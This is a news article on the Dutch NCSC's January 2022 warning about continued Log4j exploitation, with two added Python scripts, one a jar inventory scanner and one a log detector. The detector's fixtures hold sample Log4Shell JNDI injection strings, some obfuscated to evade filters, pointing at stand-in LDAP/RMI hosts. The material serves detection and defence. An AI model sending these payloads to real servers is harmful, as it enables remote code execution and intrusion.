
Lingering Log4j risks still at large, Dutch cyber security agency warns

The Dutch National Cyber Security Centre (NCSC) has warned that organisations should still be aware of risks connected to Log4j attacks and remain vigilant for ongoing threats.

Tue, 25 Jan 2022

While many organisations moved quickly after the disclosure of Log4Shell to patch or otherwise mitigate the vulnerability, the NCSC has warned that threat actors are likely still working to breach new targets.

According to the Dutch cyber security agency, malicious parties are expected to keep searching for vulnerable systems and to carry out targeted attacks in the coming period.

"It is therefore important to remain vigilant."


"The NCSC advises organisations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary.

"In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity," the Dutch cyber security agency said in a statement.
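The NCSC's first recommendation, monitoring whether vulnerable systems are in use, is in practice an inventory problem: log4j-core is usually buried inside application archives rather than installed on its own. The following Python script is an added example, not code from the NCSC or from this article. It walks a directory tree, opens every .jar/.war/.ear/.zip (including archives nested inside archives), reads the log4j-core version from the Maven pom.properties that the official jars ship with, and checks whether the JndiLookup class is still present, since deleting that class was the documented stop-gap for installations that could not upgrade at once. The fixed-version table (2.17.1, 2.12.4 and 2.3.2 for the Java 8, 7 and 6 branches) comes from the Apache Log4j security advisories; the jars it scans are constructed fixtures built in a temporary directory, and the directory layout and file names are invented for the demonstration.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# First release on each maintained branch that closes CVE-2021-44228 and the
# follow-up CVEs (2021-45046, 2021-45105, 2021-44832); anything below is stale.
FIXED_BY_BRANCH = {(2, 3): "2.3.2", (2, 12): "2.12.4"}
FIXED_DEFAULT = "2.17.1"

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 0, 0); '2.0-beta9' -> (2, 0, 0, -2, 9), so pre-releases sort first."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?", text.strip())
    if not m:
        return None
    stage = {"alpha": -3, "beta": -2, "rc": -1, None: 0}[m.group(4)]
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), stage, int(m.group(5) or 0))

def needs_upgrade(version):
    """True if this log4j-core version is below the fixed release for its branch; None if unparseable."""
    v = parse_version(version)
    if v is None:
        return None
    return v < parse_version(FIXED_BY_BRANCH.get(v[:2], FIXED_DEFAULT))

def classify(version, has_jndi_lookup):
    stale = needs_upgrade(version)
    if stale is None:
        return "unknown-version"      # shaded or repackaged build: review by hand
    if not stale:
        return "patched"
    # A stale jar with JndiLookup.class deleted is not exploitable through JNDI
    # lookups (the documented stop-gap), but it still needs the real upgrade.
    return "vulnerable" if has_jndi_lookup else "no-jndilookup"

def scan_archive(data, name, findings, depth=0):
    """Inspect one zip-format archive held in memory, recursing into archives nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_LOOKUP_CLASS in names:
            version = "?"
            if POM_PROPS in names:
                m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
                version = m.group(1).strip() if m else "?"
            findings.append((name, version, classify(version, JNDI_LOOKUP_CLASS in names)))
        if depth < 4:   # jar inside WAR inside EAR inside ZIP is as deep as it realistically goes
            for entry in names:
                if entry.lower().endswith(ARCHIVE_SUFFIXES):
                    scan_archive(zf.read(entry), f"{name}!{entry}", findings, depth + 1)

def scan_path(root):
    """Walk a directory tree; return (archive, version, status) for every log4j-core found."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            scan_archive(path.read_bytes(), str(path), findings)
    return findings

# --- constructed fixtures: minimal jars carrying only the Maven metadata and a
# --- placeholder JndiLookup.class, which is all the checks above look at.
def make_jar(version, with_jndi_lookup=True):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # placeholder bytes, not real bytecode
    return buf.getvalue()

def build_sample_tree(root):
    root = Path(root)
    (root / "app1" / "lib").mkdir(parents=True)
    (root / "app1" / "lib" / "log4j-core-2.14.1.jar").write_bytes(make_jar("2.14.1"))
    (root / "app2").mkdir()
    (root / "app2" / "log4j-core-2.17.1.jar").write_bytes(make_jar("2.17.1"))
    (root / "app3").mkdir()
    (root / "app3" / "log4j-core-2.14.1-stripped.jar").write_bytes(make_jar("2.14.1", with_jndi_lookup=False))
    war = io.BytesIO()   # the usual deployment shape: the jar nested under WEB-INF/lib of a WAR
    with zipfile.ZipFile(war, "w") as w:
        w.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", make_jar("2.12.1"))
    (root / "app4.war").write_bytes(war.getvalue())

def run_demo():
    """Build the fixtures in a temp dir, scan them, and map each jar's basename to its status."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_tree(d)
        return {Path(name.split("!")[-1]).name: status for name, _, status in scan_path(d)}

if __name__ == "__main__":
    for jar, status in run_demo().items():
        print(f"{status:16} {jar}")
```

Against a real estate, call scan_path on each deployment root. A shaded jar that drops the Maven metadata shows up as unknown-version and has to be checked by hand, and a no-jndilookup result means the stop-gap is in place but the upgrade is still outstanding, which is exactly the situation the NCSC is asking organisations to keep tracking.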

Log4j vulnerabilities, Log4Shell in particular, are very appealing attack vectors for both financially motivated and state-backed attackers, because the open-source Apache Log4j logging library is embedded in a wide range of products from dozens of vendors.

Log4Shell in particular can be exploited remotely and without authentication against any reachable server that logs attacker-controlled input, whether that server is exposed to the internet or only to the local network, giving attackers a foothold from which they can move laterally through a network until they reach sensitive internal systems.
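Because the exploit rides on input that reaches a Log4j logger, web access logs and application logs are the natural place to look for the scanning the NCSC expects to continue. The following Python script is an added example, not code from this article or from the NCSC. It normalises each log line (percent-decoding, unwrapping the nested ${lower:}, ${upper:} and ${...:-x} lookups that scanners use to slip past naive string matching, then lowercasing) before looking for a ${jndi:...} lookup, and reports the client address and the target URL. The sample log lines are constructed for the example, with hosts in the reserved documentation address ranges, and the normalisation deliberately ignores lookups a real Log4j resolver would evaluate (env, sys, date and so on): it is a detection heuristic, not an emulator.

```python
import re
from urllib.parse import unquote

# An innermost Log4j lookup: body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with any scheme (ldap, ldaps, rmi, dns, ...), matched after normalisation.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(([a-z][a-z0-9+.-]*):[^}]*)\}")

def _resolve(m):
    """Collapse one innermost lookup to the literal text Log4j would substitute.

    Covers the evasions seen in scanning traffic: ${lower:j}, ${upper:j},
    ${::-j} and ${env:NOPE:-j}. A ${jndi:...} lookup is left intact so the
    outer match can see it; other lookups without a default are dropped.
    Simplification for detection purposes, not a faithful Log4j resolver.
    """
    body = m.group(1)
    prefix, _, arg = body.partition(":")
    p = prefix.lower()
    if p == "jndi":
        return m.group(0)
    if ":-" in body:                 # ${anything:-DEFAULT} -> DEFAULT
        return body.split(":-", 1)[1]
    if p == "lower":
        return arg.lower()
    if p == "upper":
        return arg.upper()
    return ""

def normalize(text, max_rounds=32):
    """Percent-decode (twice, for double encoding), unwrap nested lookups, then lowercase."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text.lower()

def find_jndi(line):
    """Return (scheme, target) for the first JNDI lookup in the line, or None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return (m.group(2), m.group(1)) if m else None

def scan_access_log(lines):
    """Return (line_no, client_ip, scheme, target) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit:
            hits.append((n, line.split(" ", 1)[0], hit[0], hit[1]))
    return hits

# Constructed sample lines in Apache combined format. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges; nothing here is a real host.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jan/2022:10:01:02 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Jan/2022:10:01:03 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - [25/Jan/2022:10:01:04 +0100] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/x}"',
    '203.0.113.13 - - [25/Jan/2022:10:01:05 +0100] '
    '"GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.14 - - [25/Jan/2022:10:01:06 +0100] "GET /docs/jndi-lookups.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, client, scheme, target in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {client} sent ${{jndi:{target}}} ({scheme})")
```

The target host in a hit is the attacker's LDAP or RMI listener, which is the useful pivot for blocking and for checking whether any internal host ever connected to it; a match in the access log only proves an attempt, so the outbound-connection check is what separates scanning from compromise.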

After its disclosure, multiple threat actors started deploying Log4Shell exploits, including hacking groups linked to governments in China, Iran, North Korea, and Turkey and access brokers used by ransomware gangs.

Log4j is still under active exploitation

The NCSC's warning is well-timed: government agencies and private organisations worldwide have issued multiple alerts about ongoing Log4j exploitation.

For instance, a Microsoft report last week described attempts by unknown threat actors to extend Log4j attacks to an organisation's internal LDAP servers by exploiting a zero-day in SolarWinds Serv-U.

The attempts failed because the LDAP servers in question were Windows domain controllers, which were not vulnerable to the Log4j exploits.

One week earlier, Microsoft warned that a China-based threat actor it tracks as DEV-0401 was using Log4Shell exploits against internet-exposed VMware Horizon servers to deploy Night Sky ransomware.

"As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon," Microsoft said.

"Our investigation shows that successful intrusions in these campaigns led to the deployment of the Night Sky ransomware."

Microsoft's reports were preceded by an alert from the UK's National Health Service (NHS) on 5 January about attackers targeting VMware Horizon systems with Log4Shell exploits.

